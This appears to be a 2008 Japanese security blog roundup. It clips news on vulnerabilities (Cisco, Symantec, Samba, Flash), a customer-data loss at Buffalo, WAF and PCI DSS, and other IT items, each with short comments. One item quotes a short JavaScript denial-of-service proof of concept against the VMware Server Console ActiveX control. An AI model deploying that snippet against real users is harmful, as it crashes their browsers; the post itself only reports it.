Cisco Systems - Redirect to

IT セキュリティ

Cisco Worksにリモートから任意のコードを実行できる脆弱性が存在するそうです。

CiscoWorks Common Services contains a vulnerability that could allow a remote attacker to execute arbitrary code. This vulnerability is documented in Cisco Bug ID CSCsm77245 ( registered customers only) , and has been assigned the Common Vulnerabilities and Exposures (CVE) ID CVE-2008-2054.

関連URL

screenshot

Symantec Backup Exec System Recovery Manager Directory Traversal Vulnerability

IT セキュリティ

BackupExecのSystem Recovery Managerにディレクトリトラバーサル脆弱性が存在するそうです。

Symantec Backup Exec System Recovery Manager is prone to a directory-traversal vulnerability.
An attacker can exploit this issue to access privileged system files and gain unauthorized access to the affected computer.
This issue affects these versions:
Symantec Backup Exec System Recovery Manager 7 prior to 7.0.4
Symantec Back Exec System Recovery Manager 8 prior to 8.0.2.

関連URL

screenshot

パソコン周辺機器バッファローのプレスリリース 個人情報の紛失事故について

IT セキュリティ

保管場所変更対応で社内専用便で輸送中に荷崩れで箱1個が紛失したそうです。

1.紛失事故の概要

 2008年5月26日10時5分頃、修理受付票及びその添付関連書類の入った文書保存箱を保管場所変更の目的で社内専用便により輸送中、荷崩れし1箱が落下しました。その後多くは回収できましたが、一部が未回収となっております。

2.紛失した個人情報

・修理受付票及びその添付関連書類に記載の個人情報 99名分
 3/14・17・18日に、当社から修理品をお送りしたお客様の一部が該当します。

3.紛失した個人情報の内容

 氏名、住所、電話番号、FAX番号、Eメールアドレス

99名分だそうです。

2.紛失した個人情報
  修理受付票及びその添付関連書類に記載の個人情報 99名様分
3/14・17・18日に、当社から修理品をお送りしたお客様の一部が該当します。

screenshot

シスコがルーターのAPIを公開、動的な設定変更などを可能に:ITpro

IT セキュリティ

CiscoがISRのAPIを公開するとの事。コマンド入力やパケットキャプチャ、イベント通知のAPIが公開されるとの事。

ALL Denyな設定で自分を殺さないようなルータ保護機能を持ってほしいなぁ。

シスコシステムズは2008年5月28日、統合型ルーターCisco ISR」シリーズのAPIを7月に公開すると発表した。ルーター情報の取得、CLI(コマンド・ライン・インタフェース)コマンドの入力、イベントの通知、パケットのキャプチャといったAPIを利用できる。APIを利用するには、Linuxを搭載したカード型モジュールをCisco ISRシリーズに追加する必要がある。「これまでAPIの公開はしていなかったので、シスコとして初の試みとなる」

認証とルーティングをつなげるとか、VPNの接続先を動的に設定とか面白そうだなぁ。

APIを利用するためのモジュールを「AXP(Application eXtension Platform)モジュール」と呼ぶ(写真)。AXPモジュールはLinux OSを搭載したサーバーとして利用できる。例えば、ICカードの管理サーバー機能を持たせ、ICカードに応じて異なる接続先にVPN(仮想私設網)を設定するような使い方が可能だ。

screenshot

連絡が取れない歴史的PIアドレスの割り当て先一覧の再確認のお願い

IT セキュリティ

歴史的PIアドレスで連絡が取れない組織への最終勧告。

JPNICでは、3月11日より、 使用されておらず連絡が取れない歴史的 PIアドレスの割り当て先組織の一覧を公開しております。 公開後、一部については関係組織の方からご連絡があり、 おかげさまでIPアドレスおよび割り当て先の状況を確認させていただくことができました。
公開期間は6月10日までの予定であり、 公開期間の終了が近づいてまいりましたので、再度ご連絡申し上げます。 いま一度ご確認のうえ、 リスト中の割り当て先組織に該当すると思われる組織のご担当者様におかれましては、 下記の必要事項を明記のうえ、 JPNICへ電子メールにてご連絡を賜りますようお願い申し上げます

screenshot

「PCI DSS対策にはWAFの導入が必須だ」---Web高速化装置大手のF5がアピール:ITpro

IT セキュリティ

PCI DSSではWAFが必要ですか・・・

「安全なクレジット・カード決済のため,WAF(Web Application Firewall)の重要性が増している。企業にとってWAFはもはや必須だ」---。こうWAFの重要性をアピールするのは,WAF機能を持つWeb高速化装置を出荷するF5ネットワークスジャパンである。同社でエンジニアリングマネージャを務めるJoe Poehls氏は2008年5月28日,WAFが必須となる根拠を示すとともに,同社製品が備えるWAF機能をアピールした。

F5さん、WAFの導入がもはや簡単とかおっしゃってますよ!

IPS的な動きと、自動学習で簡単導入らしいです。じゃ、毎日同じ時間に同じ攻撃パケットを送ればホワイトになるとw

同社はさらに,WAFの導入はもはや簡単であり,従来のような導入の難しさが無くなった点を強調した。以前のWAFでは,WAFに対するセキュリティ・ポリシーを設定するために,守るべき業務アプリケーションの内容について詳しく知る必要があったという。ところが,現在では,既知の攻撃パターンが分かっているほか,日常のトレンドを自動学習した上で日常と異なるアクセスを検知することも可能であり,さらにポリシー設定の方法に工夫を凝らすことで初期導入と運用開始までの時間が短く済むとしている。

転送データにクレジットカード情報が入っていたらとめる?外向けに出たらとめるってことか。

通常ならルートが違うだろうからそっちにIPSを入れるってイメージかな。
大手クレジットカード会社のカード番号に関する知識wwww、カード番号パターンとかか!

PCI DSS対策を特に意識した機能としては,転送データ中にクレジットカード情報が含まれていた場合にアクセスをブロックしたり,転送データ内のクレジットカード情報の一部分をマスキングして全体像を分からなくする機能がある。BIG-IP ASMの場合では,クレジットカードに関連した情報であるかどうかを判断するための材料として,大手クレジットカード会社のカード番号に関する知識を備えているという。

screenshot

Apple,「Mac OS X」の最新アップデート「10.5.3」をリリース:ITpro

IT セキュリティ

MacOSX 11.5.3がリリースされたそうです。

セキュリティ修正も含まれているとの事。

Appleは米国時間2008年5月28日,「Mac OS X Leopard」の最新バージョンとなる10.5.3をリリースした。メール・アプリケーションの「Mail」,IMソフトの「iChat」,無線機能「AirPort」などにおけるバグを解消し,安定性,互換性,セキュリティなどを向上した。
全体的には,フォントの不正確な表示や,特定のハード・ディスク装置がファインダに表示されないといった問題を修正した。

10.4なので、、、、、

同社は,バージョン10.5以上を使用しているユーザーにアップグレードを推奨している。同社のダウンロード・サイトより入手できるほか,ソフトウェア・アップデート機能を使ったインストールが可能である。

関連URL

screenshot

Webセキュリティを強化するレピュテーション機能を搭載 「Trend Micro InterScan Web Security Suite(TM) 3.1」を発表

IT TREND

TrendmicroがInterScan Web Security Suite 3.1を出したそうです。やっとか。

■ 主な機能と特徴
●HTTPおよびFTPの不正プログラムを検出
企業ネットワークとインターネットの境界で、Webサイトとの通信(HTTP)やファイル転送(FTP)に潜むウイルスやスパイウェアを検出し防ぎます。ファイルのダウンロードに加え、外部への発信も検索できます。

●Webレピュテーション機能の搭載
Webサイトの危険度を採点し、危険なWebサイトへのアクセスを防ぐWebレピュテーション機能を搭載します。Webを経由し連鎖型攻撃を行う「Webからの脅威」へ適切に対処できます。

●運用状況の把握に役立つ多彩なレポート機能
管理コンソール上で、ウイルスやスパイウェアの感染状況やクライアントの接続状況をリアルタイムにグラフで表示します。期間を指定して運用状況をレポートとして集計することも可能です。

InterScan Web Security Suite でWebレピュテーションを搭載したそうです!

トレンドマイクロは5月29日、企業向けWebセキュリティ製品スイートの最新版「Trend Micro InterScan Web Security Suite 3.1」を発売した。危険サイトのデータベースを参照してユーザーのアクセスを防止する「Webレピュテーション」機能を搭載した。

関連URL

screenshot

Flashの脆弱性は最新版で修正済み、Adobeが調査結果を公表

IT セキュリティ

Malicious swf files? (SANS) - まっちゃだいふくの日記★とれんどふりーく★の件とか、Adobe flash player vuln(SANS) - まっちゃだいふくの日記★とれんどふりーく★の件とか、結局Adobeは既知の問題で9.0.124.0で修正済みとの事。

それにしても、9.0.124.0でFireFox-2.0.0.14もIE7+IE7Proも不安定になるのは気のせいかなぁ?

Adobeでは28日、Symantecと調査を行なった結果、この脆弱性は既知のものであり、4月8日に公開した最新版のFlash Player(9.0.124.0)で修正済みであることが判明したと説明。ユーザーに対して、最新版へのアップデートを行なうことを強く推奨している。

最新版は影響ないとの最終報告をJPCERTが出しました。

28日の発表によると、Adobe Flash Playerには第三者が任意のコードを実行できる未修正の脆弱性があり、その脆弱性を使用した攻撃がすでに発生しているとのことだった。しかし、その後の調査で同脆弱性は4月8日にリリースされたFlash Player 9.0.124.0ですでに修正されていることが判明した。これにより、同脆弱性で影響を受ける製品はFlash Player 9.0.115.0、およびそれ以前、またはFlash Player 8.0.39.0、およびそれ以前となった。

関連URL

(関連:Flashの脆弱性は最新版で修正済み、Adobeが調査結果を公表 - まっちゃだいふくの日記★とれんどふりーく★Malicious swf files? (SANS) - まっちゃだいふくの日記★とれんどふりーく★Adobe flash player vuln(SANS) - まっちゃだいふくの日記★とれんどふりーく★

screenshot

asahi.com: ディスカバリー打ち上げカウントダウン始まる - サイエンス

IT 宇宙

もうカウントダウンですか、6月1日に打ち上げだったかな。

ケネディ宇宙センター(米フロリダ州)=田之畑仁】米航空宇宙局(NASA)は米東部時間28日午後3時(日本時間29日午前4時)、日本人宇宙飛行士・星出(ほしで)彰彦さん(39)らが搭乗するスペースシャトルディスカバリーの打ち上げに向けたカウントダウンを始めた。

トイレ重要!

載せるのは排泄物(はいせつぶつ)の液体を便器に吸い込むためのポンプなど。重量管理と置き場所の確保のため、本来予定していた積み荷の一部を取りやめる。
ディスカバリーの積み荷を管理しているNASAの責任者は会見で「トイレは最も優先度が高いと判断し、変更を決めた」と話した。

screenshot

「学校裏サイト」に特化した検索サイト「学校裏チェッカー」開設:RBB NAVi (ブロードバンドコンテンツ 検索サービス) 2008/05/29

IT セキュリティ

学校の裏サイト専用検索サイトを作ったそうです。

ユーザからの申請で掲載との事。結構重い・・・

サイブリッジは、いじめの温床となっているとの指摘のある「学校裏サイト」に特化した検索サイト「学校裏チェッカー」の運用を開始した。各学校裏サイトをエリア、学校別に検索することができる。
「学校裏チェッカー」は、全国3万8000件近くあると言われている小学校、中学校、高校の各学校裏サイトをエリア、学校別に検索することができる“学校裏サイト特化型”の検索サービス。通常の検索エンジンでは発見できない学校ごとの裏サイトを、ユーザーからの申請によって掲載していく。

逆に増えなければ良いのですが・・・

仲間内での誹謗中傷などで教育問題に発展している学校裏サイトを、各学校の学生や父兄、誰もが簡単に検索・閲覧できるようにすることで、学内、学外のトラブルを抑える手助けをしていくのがねらい。社内外の有志で組織されたチェッカーズと呼ばれる学校裏サイトのチェックボランティアスタッフと協力しながら年内には3万件の学校裏サイトの掲載を目指している。

screenshot

VMware Server Console ActiveX Denial of Service PoC

IT セキュリティ

ripjyr2008-05-29

遊んでる?!2008個を入れると死ぬみたい。

<!--
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) { 
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}  
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
-->

screenshot

アップデートは近日中に? :Sambaに深刻な脆弱性、不正パケットで悪用の恐れ - ITmedia エンタープライズ

IT セキュリティ

Sambaにパケットを受けるだけで任意のコードを実行できる脆弱性が存在するそうです。

アドバイザリーによると、脆弱性はSMBパケットを解析する際の境界エラーに起因する。この問題を突かれると、攻撃者がユーザーをだまして悪質なサーバに接続させることができ、細工を施したパケットを送りつけることで任意のコードを実行することが可能になるという。
Secuniaのリスク評価は5段階で上から2番目に高い「Highly critical」。脆弱性はバージョン3.0.28aと3.0.29で確認され、それ以前のバージョンも影響を受ける可能性がある。

関連URL

screenshot

不要なアカウントは削除しないといけない:ITpro

IT セキュリティ

デフォルトアカウントの削除をPCI DSSでは求められているそうです。

製品によってはデフォルト設定(初期設定)で,管理者パスワードやアカウントが設定されていることがある。その情報は製品マニュアルやインターネットなど公開情報から取得できる。従って,悪用防止のため事前に変更しなければならない。
PCI DSSの要件2は,デフォルト設定の削除を求めている。また,その変更を行うまでは,セキュリティ侵害を受ける可能性があるので,製品をネットワークに接続することは禁じられている。

screenshot

「情報共有→ビジネス成功」を導くノウハウはこれだ

IT セキュリティ

SNSで雑談をすることを問題視する経営層がいるそうですが、普通の雑談やメールと何が違うのか?という意見

確かに。雑談との違いはないねぇ・・・

ここで、よく聞かれるのが、ブログやSNSを社内で展開すると、社員が業務に関係ない雑談に時間を費やすことになり、生産性が低下するのではという意見だ。これは、Enterprise 2.0に対して典型的に聞かれる、日本のマネジメント層の反応だが、マカフィー教授によれば米国でも状況は似たようなものであるそうだ。
この不安に対してマカフィー教授は「Enterprise 2.0を導入する前は、あなたの会社の社員は会社で業務以外の会話を全くしなかったのですか?」と回答するそうだ。多少の遊びの要素はどの組織にもあるし、それが必ずしも悪いこととは言えない。もちろん、極端なケース(たとえば、明らかに違法な情報をブログに書き込んだり、丸一日をブログに費やすなど)に対してはマネジメントのアクションが必要だが、過剰なルール設定は避けるべきだ。

企業別SNS展開パターンとかどっか出さないものかなぁ・・・

もうひとつのポイントはジェネレーションギャップをうまく解消することだ。前回も書いたが、Web 2.0系のテクノロジーの活用度合いは、世代により大きく異なる。米国のEnterprise 2.0の事例では、現場の若手が積極的、シニアマネジメントも積極的、しかし、中間管理職だけが消極的というケースが、よくあるようだ。事情は日本も同じだろう。Enterprise 2.0のプロジェクトは既にネットでWeb 2.0が体に染みついている若年層の主導で行なった方がうまくいく可能性が高いかもしれない。

screenshot